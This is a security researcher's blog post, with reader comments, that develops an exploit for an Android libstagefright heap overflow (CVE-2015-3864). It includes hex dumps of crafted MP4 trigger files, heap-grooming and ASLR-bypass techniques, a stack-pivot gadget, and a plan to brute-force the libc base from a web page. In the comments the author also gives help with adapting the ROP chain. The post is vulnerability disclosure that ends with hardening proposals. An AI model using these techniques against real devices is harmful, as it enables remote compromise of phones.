Wednesday, September 16, 2015

Stagefrightened?

Posted by Mark Brand, Bypasser of Mitigations

There’s been a lot of attention recently around a number of vulnerabilities in Android’s libstagefright, and a lot of confusion about the remote exploitability of the issues, especially on modern devices. In this blog post we will demonstrate an exploit for one of the libstagefright vulnerabilities that works on recent Android versions (Android 5.0+ on Nexus 5).

The vulnerability (CVE-2015-3864) that we’ve chosen to exploit stems from an imperfect patch for one of the issues reported by Joshua Drake, which has been fixed for Nexus devices in the September bulletin. Several parties noticed the problem, including at least Exodus Intel and Natalie Silvanovich of Project Zero. It’s a promising-looking bug from an exploitation perspective: a linear heap overflow giving the attacker control over the size of the allocation, the amount of overflow, and the contents of the overflowed memory region.

The vulnerable code is in handling the ‘tx3g’ chunk type when parsing MPEG4 video files. Here’s the original vulnerable code:

Note when reading that chunk_size is a uint64_t that is parsed from the file; it’s completely controlled by the attacker and is not validated with regards to the remaining data available in the file.

The issue with this patch is that chunk_size does not actually have type size_t; it is a uint64_t even on 32-bit platforms (most Android devices are currently 32-bit, and the mediaserver is currently a 32-bit process even on 64-bit Android devices). The check appears sufficient at a casual glance, but it is not: chunk_size can be larger than SIZE_MAX, causing the check to pass.
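
The arithmetic behind this can be sketched in a few lines of C. This is only a model: it uses uint32_t in place of size_t so that it behaves like a 32-bit process on any host, and it assumes the check has the form SIZE_MAX - chunk_size <= size, which is an assumption made for illustration since the patched source is not reproduced here. The names SIZE_MAX_32, check_rejects and alloc_size are hypothetical.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* SIZE_MAX as seen by a 32-bit process such as the mediaserver. */
#define SIZE_MAX_32 ((uint64_t)UINT32_MAX)

/* Assumed shape of the patched check. chunk_size is 64-bit, so the
 * subtraction is done in 64-bit arithmetic; when chunk_size is larger
 * than SIZE_MAX_32 it wraps around to a huge value that is never <= size. */
bool check_rejects(uint64_t chunk_size, uint32_t size) {
    return SIZE_MAX_32 - chunk_size <= (uint64_t)size;
}

/* Size of the new buffer once the check has passed: the 64-bit sum is
 * truncated to 32 bits, as it would be when converted to a 32-bit size_t. */
uint32_t alloc_size(uint64_t chunk_size, uint32_t size) {
    assert(!check_rejects(chunk_size, size));
    return (uint32_t)((uint64_t)size + chunk_size);
}
```

Under these assumptions, an existing size of 64 and a chunk_size of 0xffffffffffffffe0 are not rejected and produce a 32-byte allocation, while a chunk_size of 0xfffffff0 (which fits in 32 bits) is rejected as intended.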

My first step towards exploiting a bug is usually to establish proof-of-vulnerability; in this case we should definitely be able to crash the mediaserver by triggering this issue, so let’s do just that and put together a simple crash case.

We first need a file that will be detected by libstagefright as an MPEG4 and parsed accordingly; looking at the file sniffing code, we need to start with an ‘ftyp’ chunk near the start of the file.

0000000: 0000 0014 6674 7970 6973 6f6d 0000 0001  ....ftypisom....
0000010: 6973 6f6d                                isom

Note the structure of the chunk: a 4-byte big-endian chunk size, then a 4-byte tag, followed by the chunk data.
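
As a minimal sketch of that layout, the following C helper serialises one chunk into a caller-supplied buffer. The function name write_chunk and its signature are hypothetical, chosen only for this illustration; the size field counts the 8 header bytes as well as the payload, which matches the 0x14 size of the 20-byte ‘ftyp’ chunk above.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Writes one chunk (32-bit big-endian size, 4-byte tag, payload) into out.
 * Returns the number of bytes written, or 0 if the chunk does not fit. */
size_t write_chunk(uint8_t *out, size_t out_len, const char tag[4],
                   const uint8_t *data, uint32_t data_len) {
    assert(out != NULL && tag != NULL);
    if (data_len > UINT32_MAX - 8)
        return 0;
    uint32_t total = data_len + 8;  /* the size field includes the header */
    if (total > out_len)
        return 0;
    out[0] = (uint8_t)(total >> 24);
    out[1] = (uint8_t)(total >> 16);
    out[2] = (uint8_t)(total >> 8);
    out[3] = (uint8_t)total;
    memcpy(out + 4, tag, 4);
    if (data_len > 0)
        memcpy(out + 8, data, data_len);
    return total;
}
```

Calling it with the tag "ftyp" and the 12 payload bytes shown in the dump yields the same 20 bytes, starting 00 00 00 14.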

So we need to have at least one track before we can actually reach the vulnerable code. The ‘trak’ chunk will initialise mLastTrack, and acts as a container for additional chunks.

With the new ‘trak’ chunk added (offsets 0x14-0x33):

0000000: 0000 0014 6674 7970 6973 6f6d 0000 0001  ....ftypisom....
0000010: 6973 6f6d 0000 0020 7472 616b 0000 0018  isom... trak....
0000020: 7478 3367 4141 4141 4141 4141 4141 4141  tx3gAAAAAAAAAAAA
0000030: 4141 4141                                AAAA

The ‘tx3g’ chunk contained in the ‘trak’ chunk occupies offsets 0x1c-0x33 of the same file:

0000000: 0000 0014 6674 7970 6973 6f6d 0000 0001  ....ftypisom....
0000010: 6973 6f6d 0000 0020 7472 616b 0000 0018  isom... trak....
0000020: 7478 3367 4141 4141 4141 4141 4141 4141  tx3gAAAAAAAAAAAA
0000030: 4141 4141                                AAAA

So, this file will get us into the ‘tx3g’ case once; but it won’t trigger the vulnerability. In order to do that, we need to visit the case again with another chunk, this time with a chunk_size large enough to trigger an overflow. Keeping things simple, we’ll supply a chunk_size of -1 = 0xffffffffffffffff.

0000000: 0000 0014 6674 7970 6973 6f6d 0000 0001  ....ftypisom....
0000010: 6973 6f6d 0000 0020 7472 616b 0000 0018  isom... trak....
0000020: 7478 3367 4141 4141 4141 4141 4141 4141  tx3gAAAAAAAAAAAA
0000030: 4141 4141 0000 0001 7478 3367 ffff ffff  AAAA....tx3g....
0000040: ffff ffff 4242 4242 4242 4242 4242 4242  ....BBBBBBBBBBBB
0000050: 4242 4242 4242 4242 4242 4242 4242 4242  BBBBBBBBBBBBBBBB
0000060: 4242 4242                                BBBB

Notice that the structure of this second chunk is a little different; we have to use the extended chunk_size code path triggered by a chunk_size of 1 in order to set the full 64-bit chunk_size.
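
The two header forms can be illustrated with a small parser sketch in C. It is not the libstagefright code; the type chunk_header and the function parse_chunk_header are hypothetical names, and the sketch only models the behaviour described above: a 32-bit size of 1 means the real size follows the tag as a 64-bit big-endian value.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

typedef struct {
    uint64_t chunk_size;  /* total chunk size as stored in the file */
    uint32_t tag;         /* four-character code, packed big-endian */
    size_t header_len;    /* 8 for the short form, 16 for the extended form */
} chunk_header;

/* Reads an n-byte big-endian unsigned integer. */
static uint64_t read_be(const uint8_t *p, int n) {
    uint64_t v = 0;
    for (int i = 0; i < n; i++)
        v = (v << 8) | p[i];
    return v;
}

/* Returns 1 on success, 0 if the buffer is too short for the header. */
int parse_chunk_header(const uint8_t *buf, size_t len, chunk_header *out) {
    assert(buf != NULL && out != NULL);
    if (len < 8)
        return 0;
    out->chunk_size = read_be(buf, 4);
    out->tag = (uint32_t)read_be(buf + 4, 4);
    out->header_len = 8;
    if (out->chunk_size == 1) {
        /* extended form: the 64-bit size follows the tag */
        if (len < 16)
            return 0;
        out->chunk_size = read_be(buf + 8, 8);
        out->header_len = 16;
    }
    return 1;
}
```

Fed the 16 bytes starting at offset 0x34 of the file above, this sketch reports a 16-byte header and a chunk_size of 0xffffffffffffffff.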

We now have a simple file to trigger the issue. When I open this file in Chrome on my Nexus 5 with some extra debugging code, it prints some useful information to the Android system logs:

We can clearly see here that the input file triggered two allocations by the parser on handling the two ‘tx3g’ chunks, and that we’re definitely writing data out-of-bounds of our allocated memory in the last two lines.

Since we’re only overflowing a handful of bytes, and the heap allocator in use on this Android version is based on jemalloc, it’s relatively unlikely that we’ll overwrite anything important and see a crash with such a small overwrite. Modifying the PoC file so that the parser will write a big old chunk of bytes instead should get us a demonstrable crash; that’s as simple as adding more ‘B’s to the end of the file and fixing up the chunk lengths; this is left as an exercise for the interested reader.

We need a few heap-manipulation primitives to get things set up in a dependable fashion. The first thing that I looked for was a primitive to allocate blocks of memory - this will be used for a number of different things in the exploit. Fortunately, there’s a good primitive available in the handling for ‘pssh’ chunks:

    // and store it, so the allocation lives for the lifetime of our MPEG4Extractor
    // (these pssh blocks are in fact released in the destructor for the MPEG4Extractor)
    mPssh.push_back(pssh);

    break;
}

This is the first component of our heap-groom; we can use up any fragmented allocations in the size class that we want, ensuring that further allocations are likely to be contiguous.

Now we want a second primitive: allocations for which we control both the allocation and the release. There are a lot of places where allocations occur during parsing of the mp4, but the most useful that I found for this purpose were the handlers for two chunk types, ‘avcC’ and ‘hvcC’. When handling these chunk types, the parser will allocate a block of memory and store it, and will replace that allocation with a new one when it encounters a second chunk of the same type.

case FOURCC('a', 'v', 'c', 'C'):
{
    *offset += chunk_size;

    sp<ABuffer> buffer = new ABuffer(chunk_data_size);

    if (mDataSource->readAt(
                data_offset, buffer->data(), chunk_data_size) < chunk_data_size) {
        return ERROR_IO;
    }

    // this internally copies buffer->data() into a buffer of size chunk_data_size, and
    // releases the previously stored data.
    mLastTrack->meta->setData(
            kKeyAVCC, kTypeAVCC, buffer->data(), chunk_data_size);

    break;
}
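
The copy-and-replace behaviour described in the comment can be modelled in plain C as follows. This is a simplified stand-in, not the libstagefright API: meta_slot and slot_set_data are hypothetical names, and the order in which the old buffer is released and the new one allocated is an assumption of the sketch.

```c
#include <assert.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical stand-in for one keyed metadata entry. */
typedef struct {
    void *data;
    size_t size;
} meta_slot;

/* Releases whatever the slot held before, then stores a private copy of src.
 * Returns 0 on success, -1 if the new allocation fails (slot left empty). */
int slot_set_data(meta_slot *slot, const void *src, size_t size) {
    assert(slot != NULL && src != NULL && size > 0);
    free(slot->data);              /* the "release" half of the primitive */
    slot->data = NULL;
    slot->size = 0;
    void *copy = malloc(size);     /* the "allocate" half of the primitive */
    if (copy == NULL)
        return -1;
    memcpy(copy, src, size);
    slot->data = copy;
    slot->size = size;
    return 0;
}
```

The first call on an empty slot gives an allocation of a chosen size; a later call with a different size releases that block and makes a new one elsewhere, which is the property the groom relies on.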

The plan to gain control of execution is to arrange for the overflow to overwrite an object of type MPEG4DataSource. This is an object of size 32 bytes (on my phone), which the parser allocates when it encounters an ‘stbl’ chunk. The new data source is then used for parsing all sub-chunks contained within the ‘stbl’ chunk. So our aim is to create the following situation:

So, we need to arrange our heap carefully so that we can ensure a free space directly before the allocated MPEG4DataSource.

First we need to make a couple of small sized allocation chunks; a small ‘avcC’ chunk and ‘hvcC’ chunk. These trigger additional temporary allocations in sizes that will interfere with our groom allocations, so we get them out of the way before we start laying out memory.

0000000: 0000 0014 6674 7970 6973 6f6d 0000 0001  ....ftypisom....
0000010: 6973 6f6d 0000 0028 7472 616b 0000 0010  isom...(trak....
0000020: 6176 6343 4141 4141 4141 4141 0000 0010  avcCAAAAAAAA....
0000030: 6876 6343 4848 4848 4848 4848            hvcCHHHHHHHH

Then we will create our initial ‘tx3g’ allocation. This needs to be the size we’re going to write during the memcpy; we’ll make it 64 bytes for now, so that it completely overwrites the MPEG4DataSource object. The ‘2’s are the bytes that will be written outside the final 32 byte allocation as the result of the overflow.

0000000: 0000 0014 6674 7970 6973 6f6d 0000 0001  ....ftypisom....
0000010: 6973 6f6d 0000 0068 7472 616b 0000 0010  isom...htrak....
0000020: 6176 6343 4141 4141 4141 4141 0000 0010  avcCAAAAAAAA....
0000030: 6876 6343 4848 4848 4848 4848 0000 0040  hvcCHHHHHHHH...@
0000040: 7478 3367 3131 3131 3131 3131 3131 3131  tx3g111111111111
0000050: 3131 3131 3131 3131 3131 3131 3232 3232  1111111111112222
0000060: 3232 3232 3232 3232 3232 3232 3232 3232  2222222222222222
0000070: 3232 3232 3232 3232 3232 3232            222222222222

Now we’re ready to start preparing the heap. First we defragment for the targeted allocation size by allocating some ‘pssh’ blocks of the target size:

_________________

| pssh | - | pssh |

```````````````````

0000000: 0000 0014 6674 7970 6973 6f6d 0000 0001  ....ftypisom....
...
0000070: 3232 3232 3232 3232 3232 3232 0000 0040  222222222222...@
0000080: 7073 7368 6c65 616b 3030 3030 3030 3030  psshleak00000000
0000090: 3030 3030 3030 3030 0000 0020 4c4c 4c4c  00000000... LLLL
00000a0: 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c  LLLLLLLLLLLLLLLL
00000b0: 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c            LLLLLLLLLLLL
...

These blocks have some internal structure; the only part that we are really concerned with is the size of the allocation and the data.

Then we allocate an avcC and hvcC block of the target size, which should hopefully be contiguous.

________________________

| pssh | - | pssh | avcC |

``````````````````````````

_______________________________

| pssh | - | pssh | avcC | hvcC |

`````````````````````````````````

0000000: 0000 0014 6674 7970 6973 6f6d 0000 0001  ....ftypisom....
...
0000170: 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c 0000 0028  LLLLLLLLLLLL...(
0000180: 6176 6343 4141 4141 4141 4141 4141 4141  avcCAAAAAAAAAAAA
0000190: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
00001a0: 4141 4141 0000 0028 6876 6343 4848 4848  AAAA...(hvcCHHHH
00001b0: 4848 4848 4848 4848 4848 4848 4848 4848  HHHHHHHHHHHHHHHH
00001c0: 4848 4848 4848 4848 4848 4848            HHHHHHHHHHHH

In actual fact, we have a temporary allocation occurring during parsing of the avcC and hvcC blocks, so the heap will actually look like this:

______________________________________

| pssh | - | pssh | .... | avcC | hvcC |

```````````````````````````````````````

So we need to allocate another pssh block to fill the space:

______________________________________

| pssh | - | pssh | pssh | avcC | hvcC |

```````````````````````````````````````

We can then free the hvcC block and trigger the allocation of our target MPEG4DataSource:

______________________________________

| pssh | - | pssh | pssh | avcC | .... |

```````````````````````````````````````

_________________________________________________

| pssh | - | pssh | pssh | avcC | MPEG4DataSource |

```````````````````````````````````````````````````

0000000: 0000 0014 6674 7970 6973 6f6d 0000 0001  ....ftypisom....
...
00001c0: 4848 4848 4848 4848 4848 4848 0000 0040  HHHHHHHHHHHH...@
00001d0: 7073 7368 6c65 616b 3030 3030 3030 3030  psshleak00000000
00001e0: 3030 3030 3030 3030 0000 0020 4c4c 4c4c  00000000... LLLL
00001f0: 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c  LLLLLLLLLLLLLLLL
0000200: 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c 0000 0048  LLLLLLLLLLLL...H
0000210: 6876 6343 4848 4848 4848 4848 4848 4848  hvcCHHHHHHHHHHHH
0000220: 4848 4848 4848 4848 4848 4848 4848 4848  HHHHHHHHHHHHHHHH
0000230: 4848 4848 4848 4848 4848 4848 4848 4848  HHHHHHHHHHHHHHHH
0000240: 4848 4848 4848 4848 4848 4848 4848 4848  HHHHHHHHHHHHHHHH
0000250: 4848 4848 0000 0008 7374 626c            HHHH....stbl

Then inside our ‘stbl’ chunk we just need to release the ‘avcC’ chunk and trigger the ‘tx3g’ overflow.

_________________________________________________

| pssh | - | pssh | pssh | tx3g | MPEG4DataSource |

```````````````````````````````````````````````````

_________________________________________________

| pssh | - | pssh | pssh | tx3g ---------------------->

```````````````````````````````````````````````````

0000000: 0000 0014 6674 7970 6973 6f6d 0000 0001  ....ftypisom....
...
0000250: 4848 4848 0000 0060 7374 626c 0000 0048  HHHH...`stbl...H
0000260: 6176 6343 4141 4141 4141 4141 4141 4141  avcCAAAAAAAAAAAA
0000270: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
0000280: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
0000290: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
00002a0: 4141 4141 0000 0001 7478 3367 ffff ffff  AAAA....tx3g....
00002b0: ffff ffe0                                ....

Viewing the resulting file in a webpage in Chrome results in the following stack trace:

Which is exactly what we were aiming for; we crashed trying to load a function address through the vtable pointer for our corrupted data source object.
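
To make the mechanism concrete, here is a toy C model of a virtual call. It is not the MPEG4DataSource class; every name in it (source, source_vtable, call_read_at and so on) is hypothetical. The point it illustrates is that the table pointer is the first field of the object, so whatever overwrites the start of the object decides where the next virtual call looks up its target.

```c
#include <assert.h>
#include <string.h>

struct source;

/* Table of function pointers, standing in for a C++ vtable. */
struct source_vtable {
    int (*read_at)(struct source *self);
};

struct source {
    const struct source_vtable *vtable;  /* first field, like a C++ vptr */
    int payload;
};

int real_read_at(struct source *self) { return self->payload; }
int other_read_at(struct source *self) { (void)self; return -1; }

const struct source_vtable real_vtable = { real_read_at };
const struct source_vtable other_vtable = { other_read_at };

/* A virtual call: load the table pointer from the object, load the slot,
 * then branch to it with the object itself as the first argument. */
int call_read_at(struct source *s) {
    assert(s != NULL && s->vtable != NULL);
    return s->vtable->read_at(s);
}

/* Models the overflow reaching the object: only the bytes that hold the
 * table pointer are replaced. */
void overwrite_vtable_pointer(struct source *s,
                              const struct source_vtable *replacement) {
    memcpy(s, &replacement, sizeof replacement);
}
```

In this model the replacement pointer refers to another valid table, so the call simply lands in a different function; in the crash above the overwritten pointer holds bytes from the file, so the load through it faults instead.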

Now we face what should be a serious challenge: due to ASLR we have no idea where anything is in memory, so we need somehow to get some data that we control somewhere that we can do something useful with. Due to the way that Linux/Android implements ASLR for mmap mappings, it is quite easy for us to get an allocation mapped at a predictable address; jemalloc as configured on my Nexus 5 falls back to directly mmap’ing huge chunks for allocations above 0x40000 bytes.

The behaviour of mmap means that these allocations will simply occur down the address space linearly from a randomised start address. Since we have a very good idea how much space is going to be used already (loaded libraries and initial arena allocation), the randomisation just results in a relatively small window that we need to exhaust in order to get a predictable address. The code that implements the randomness (in arch/arm/mm/mmap.c) is as follows:

/* 8 bits of randomness in 20 address space bits */
if ((current->flags & PF_RANDOMIZE) &&
    !(current->personality & ADDR_NO_RANDOMIZE))
        random_factor = (get_random_int() % (1 << 8)) << PAGE_SHIFT;

So our mmap mappings can be anywhere (page-aligned, of course) in a 0-0xff000 range from the maximum position that they can be placed, and we do not need to allocate much memory to exhaust this.
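
The 0-0xff000 figure follows directly from the expression in the kernel snippet, as this small C sketch shows. It assumes 4 KiB pages (a PAGE_SHIFT of 12), and the names PAGE_SHIFT_4K, RANDOM_BITS, random_factor, max_random_factor and base_count are hypothetical helpers for the calculation rather than kernel symbols.

```c
#include <assert.h>
#include <stdint.h>

#define PAGE_SHIFT_4K 12u  /* assumption: 4 KiB pages */
#define RANDOM_BITS   8u   /* "8 bits of randomness" from the comment */

/* Offset produced for a given raw random value, mirroring the expression
 * (get_random_int() % (1 << 8)) << PAGE_SHIFT. */
uint32_t random_factor(uint32_t raw) {
    return (raw % (1u << RANDOM_BITS)) << PAGE_SHIFT_4K;
}

/* Largest possible offset: 0xff pages. */
uint32_t max_random_factor(void) {
    return ((1u << RANDOM_BITS) - 1u) << PAGE_SHIFT_4K;
}

/* Number of distinct positions the mmap base can take. */
uint32_t base_count(void) {
    return 1u << RANDOM_BITS;
}
```

With these assumptions there are only 256 possible positions, spanning just under 1 MiB, so a single mapping of 0xff000 bytes already covers the whole window.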

I was initially convinced that I must have misread something, so I coded up a quick test program to validate this:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>

#define ALLOC_SIZE  0xff000
#define ALLOC_COUNT 0x1

int main(int argc, char** argv) {
  int i = 0;
  char* min_ptr = (char*)0xffffffff;
  char* max_ptr = (char*)0;

  for (i = 0; i < ALLOC_COUNT; ++i) {
    char* ptr = mmap(NULL, ALLOC_SIZE,
                     PROT_READ | PROT_WRITE | PROT_EXEC,
                     MAP_PRIVATE | MAP_ANONYMOUS,
                     -1, 0);
    if (ptr == MAP_FAILED) {
      perror("mmap");
      return 1;
    }

    // track the lowest and highest addresses covered so far
    if (ptr < min_ptr) {
      fprintf(stderr, "new min: %p\n", ptr);
      min_ptr = ptr;
    }

    if (ptr + ALLOC_SIZE > max_ptr) {
      fprintf(stderr, "new max: %p\n", ptr + ALLOC_SIZE);
      max_ptr = ptr + ALLOC_SIZE;
    }

    // fill the mapping with 0xcc, the x86 int3 breakpoint opcode
    memset(ptr, '\xcc', ALLOC_SIZE);
  }

  fprintf(stderr, "finished min: %p max %p\n", min_ptr, max_ptr);

  // jump to the address we expect to be mapped; landing on 0xcc raises SIGTRAP
  ((void(*)())0xf7500000)();
  return 0;
}

On my Ubuntu x86_64 desktop with /proc/sys/kernel/randomize_va_space == 2, compiling and running this as a 32-bit executable reliably results in the address 0xf7500000 being mapped, and in a SIGTRAP when execution jumps there. Your mileage may vary... Similar tests on my Nexus 5 gave the same result. I knew that ASLR on 32-bit was always a bit shaky, but I didn’t think it was this broken.

It’s slightly less predictable in the mediaserver process, since large amounts of memory may have been used already in previous parsing; but we can reliably get data we control at a predictable address with a relatively small number of allocations.

After a bit of experimentation, it seemed that the best way to achieve this in practice is by wrapping a number of our ‘pssh’ chunks inside a valid sample table (‘stbl’). This triggers the creation of a caching MPEG4DataSource, which will then allocate and save all the data for the contained chunks; and will then be used to parse out the chunks. This essentially doubles the size of our spray, reducing the size of file needed.

Updating our mp4 to incorporate this page-spray and point the overwritten vtable pointer to our predictable address gets us one step further; control over the address called as the vtable function.

So now we have a controlled function call; without ASLR at this point it would be trivially game-over. All that would be needed for a reliable exploit is simply to redirect execution to a convenient gadget to stack pivot, and then build a ROP stack.

With ASLR disabled in the system config, I fairly quickly found a useful trick to pivot the stack (our function call is a vtable call, so we will always have r0 set as the this object, pointing to our corrupted MPEG4DataSource).

.text:00013354    BEQ     botch_0       ; we won’t take this branch, as we control lr
.text:00013358    MOV     R0, R1
.text:0001335C    TEQ     R0, #0
.text:00013360    MOVEQ   R0, #1
.text:00013364    BX      LR

This will load most of the registers, including the stack pointer, from an offset on r0, which points to data we control. At this point it’s then trivial to complete the exploit with a ROP chain to allocate some RWX memory, copy in shellcode and jump to it using only functions and gadgets from within libc.so.

Having completed an exploit that works with ASLR disabled, I was planning/expecting to spend a while longer looking for a cunning technique to reliably leverage the issue for a practical exploit without tampering with system settings. I started to investigate a number of different avenues, some of which were more promising than others. My usual preferred next step would be to try to leverage this overflow to construct an infoleak to get the information we need about the process. Since the mediaserver is a background process that we’re interacting with in a fairly detached way, this would likely take significant effort. One idea considered was the use of an m3u playlist file, which should be able to request remote files; if we could then corrupt some of the data responsible for handling that playlist, we might be able to leverage that to leak data. Another thought was that the metadata extracted from parsing the file is likely used by the HTML5 <video> elements; if we could, for example, store a pointer value in place of the length of the video, we could leak this from JavaScript in a browser context, and serve up a second video customised based on this leak.

Since we do not know the randomised values for the most-significant bytes of an address, we would instead perform a partial overwrite; corrupting only the least-significant byte or bytes of a pointer. I looked at partially overwriting a function pointer on the heap - there were some function pointers that could be overwritten, but they were all allocated early in the process startup, rather than during parsing of the mp4 file, and grooming was going to be problematic. I then looked at partially overwriting a vtable pointer instead. As our exploit so far is reliably corrupting a vtable pointer, it’s not a problem to adjust this to simply overwrite the least-significant byte of that vtable pointer instead. The vtables in the libstagefright library are positioned close to the GOT (Global Offset Table) which is used heavily in position-independent executables, and this means that we have a choice of a very wide range of functions that we could call instead of the intended function; this could be as subtle as creating a type-confusion with our MPEG4DataSource and another DataSource type. Continuing with the exploit at this point is looking like an extensive assessment of available functions in (and imported by) the compiled stagefright code to find one which will be useful to us...
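
A partial overwrite is easy to picture with a short C sketch. It models a 32-bit pointer stored little-endian in memory, as on 32-bit ARM Android, and a linear overflow that reaches only its first n bytes; the function name partial_overwrite and the example values are hypothetical.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Returns the pointer value that results when the first n bytes of its
 * little-endian in-memory representation are replaced by bytes[0..n-1]. */
uint32_t partial_overwrite(uint32_t pointer, const uint8_t *bytes, unsigned n) {
    assert(n <= 4);
    uint8_t mem[4];
    for (unsigned i = 0; i < 4; i++)
        mem[i] = (uint8_t)(pointer >> (8 * i));  /* least-significant byte first */
    if (n > 0)
        memcpy(mem, bytes, n);                   /* the overflow stops after n bytes */
    uint32_t result = 0;
    for (unsigned i = 0; i < 4; i++)
        result |= (uint32_t)mem[i] << (8 * i);
    return result;
}
```

Because the least-significant byte comes first in memory, a one-byte overflow changes only the low 8 bits: the randomised upper bytes stay intact, and the pointer can be moved anywhere within the same 256-byte window.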

We do have an alternative, albeit an inelegant one. The mediaserver process will respawn after a crash, and there are 8 bits of entropy in the libc.so base address. This means that we can take a very straightforward approach to bypassing ASLR. We simply choose one of the 256 possible base addresses for libc.so, and write our exploit and ROP stack assuming that layout. Launching the exploit from the browser, we use JavaScript to keep refreshing the page, and wait for a callback. Eventually memory will be laid out as we expect, bypassing ASLR with brute force in a practical enough way for real-world exploitation.

This is only possible because we can achieve a highly reliable heap-spray to get data we control at a known address, independent of the process randomisation. If we had to brute-force two addresses here, the address of our known data and the libc base, this would be less practical.

It’s also interesting to note that the mediaserver is a special case, at least on my test phone; it isn’t cloned from a zygote process, but is instead directly execve’ed - this means that the address space is re-randomised on every exploit attempt. As a result our brute force is not deterministic, and we can’t put a guaranteed upper-bound on time to exploit.

I did some extended testing on my Nexus 5; and results were pretty much as expected. In 4096 exploit attempts I got 15 successful callbacks; the shortest time-to-successful-exploit was lucky, at around 30 seconds, and the longest was over an hour. Given that the mediaserver process is throttled to launching once every 5 seconds, and the chance of success is 1/256 per attempt, this gives us a ~4% chance of a successful exploit each minute.
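
The per-minute estimate can be reproduced with a few lines of C. This is a sketch that treats every attempt as independent with the same 1/256 chance, which the re-randomisation on each respawn makes reasonable; the function names chance_of_success and attempts_in are hypothetical.

```c
#include <assert.h>

/* Probability of at least one success in `attempts` independent tries,
 * each succeeding with probability p. */
double chance_of_success(double p, unsigned attempts) {
    assert(p >= 0.0 && p <= 1.0);
    double all_fail = 1.0;
    for (unsigned i = 0; i < attempts; i++)
        all_fail *= 1.0 - p;
    return 1.0 - all_fail;
}

/* Number of attempts that fit in a time window when the target process
 * can only be relaunched once every interval_seconds. */
unsigned attempts_in(unsigned window_seconds, unsigned interval_seconds) {
    assert(interval_seconds > 0);
    return window_seconds / interval_seconds;
}
```

One launch every 5 seconds gives 12 attempts per minute, and chance_of_success(1.0 / 256.0, 12) comes out a little above 4.5%, in the same ballpark as the figure above. The same model predicts 4096 / 256 = 16 successes in 4096 attempts, close to the 15 observed.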

So, while it could be more elegant, reliable and effective to use a more sophisticated technique to exploit this bug without requiring a brute force, it turns out that it’s not really necessary. It’s not unreasonable for a real-world watering hole attack to get a user to browse a page long enough for the exploit to succeed, especially through in-app adverts using WebView.

During the last few weeks spent developing this exploit, there were a couple of additional hardening measures that we discussed internally at Project Zero, and have shared as suggestions to the Android security team.

Hardened mmap implementation. Chrome’s PartitionAlloc augments the weak randomisation provided by mmap(NULL, …) calls; Android could do a similar thing. This would dramatically reduce the effectiveness of the heap-spray, making it harder for an attacker to gain that crucial ‘controlled data at a known address’ leveraged in this exploit.

Further hardening libc implementation. Existing libc implementations have implemented pointer mangling for their setjmp/longjmp and similar functions; this has two security benefits. First, it protects against corruption of jmp_buf structures, and second, it prevents an attacker from using these functions as a one-stop ROP gadget/stack pivot.
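
The idea behind pointer mangling can be shown with a deliberately simple C model. Real implementations differ in detail (some also rotate the value, for example); this sketch only XORs with a per-process secret, and the names mangle, demangle and cookie are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

/* Value written into the saved-register buffer instead of the raw pointer. */
uintptr_t mangle(uintptr_t value, uintptr_t cookie) {
    return value ^ cookie;
}

/* Value recovered when the buffer is later used to restore registers. */
uintptr_t demangle(uintptr_t stored, uintptr_t cookie) {
    return stored ^ cookie;
}
```

A legitimate save and restore round-trips to the original value, but an attacker who plants raw addresses in the buffer without knowing the cookie gets them decoded into something else, so the restore routine stops being a convenient way to load a chosen stack pointer and program counter.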

Neither of these is a ‘hard’ mitigation; implementing them won’t prove non-exploitability of future memory corruption vulnerabilities on Android devices, but their adoption should increase the cost for attackers in developing reliable exploits for future Android vulnerabilities, and that will be a welcome success.

No; no user interaction is required; and no modification of chrome://flags. It's exploiting during the initial parse of the media file, not the playback; so it's triggered when the page containing the media file loads. Parsing has to happen at that point in order to display the duration of the video; it's not necessary to click play first.

I will be allocating 0 bytes memory for the buffer and lib will be writing out of bounds (24 bytes). I am using Android 5.0.2 (cyanogenmod) and it behaves very weird after I open such a file.

How can I debug it or view logs on my android device? It is rooted.

2) in regards to your exploit, which libc.so should I use, one from Android device?

To run the exploit I copied the libc.so from Android to the working directory. However pop_r0_r1_r2_r3_pc and pop_r4_r5_r6_r7_pc cannot be found. I hardcoded them to 0xffffffff just to see if it runs further. How to properly get those values?

You can view the crash logs as they occur by using logcat (http://developer.android.com/tools/help/logcat.html). Most builds of cyanogenmod are userdebug builds, so you should also have gdbserver on the device. You can then setup port-forwarding and debug using a gdb build that has arm support from your host.

You should indeed just copy libc.so from your device to the local folder. pop_r0_r1_r2_r3_pc and pop_r4_r5_r6_r7_pc are instruction sequences that are needed for the rop chain used in the exploit; to fix the exploit for your device you'd need to rewrite the rop chain using different instructions instead.

Great explanation. From the source code in MPEG4Extractor.cpp, I can see that for the 'stbl' chunk to trigger the MPEG4DataSource allocation, the flags for the current mDataSource must contain kWantsPrefetching or kIsCachingDataSource. Is this always the case? Also, as I understood it, the fake vtable should contain a pointer to the stack pivot in order to build the ROP stack. But how can we guarantee that the vtable pointer which we overwrite will always point to the right place in memory? Why is the heap spray full of 0xCCs?

Hi, very good article! But when I debug it, the mediaserver crashes at mLastTrack->meta->findData(kKeyTextFormatData, &type, &data, &size)) in the function parseChunk because of a segmentation violation. Has anyone come across this situation? Could we discuss it?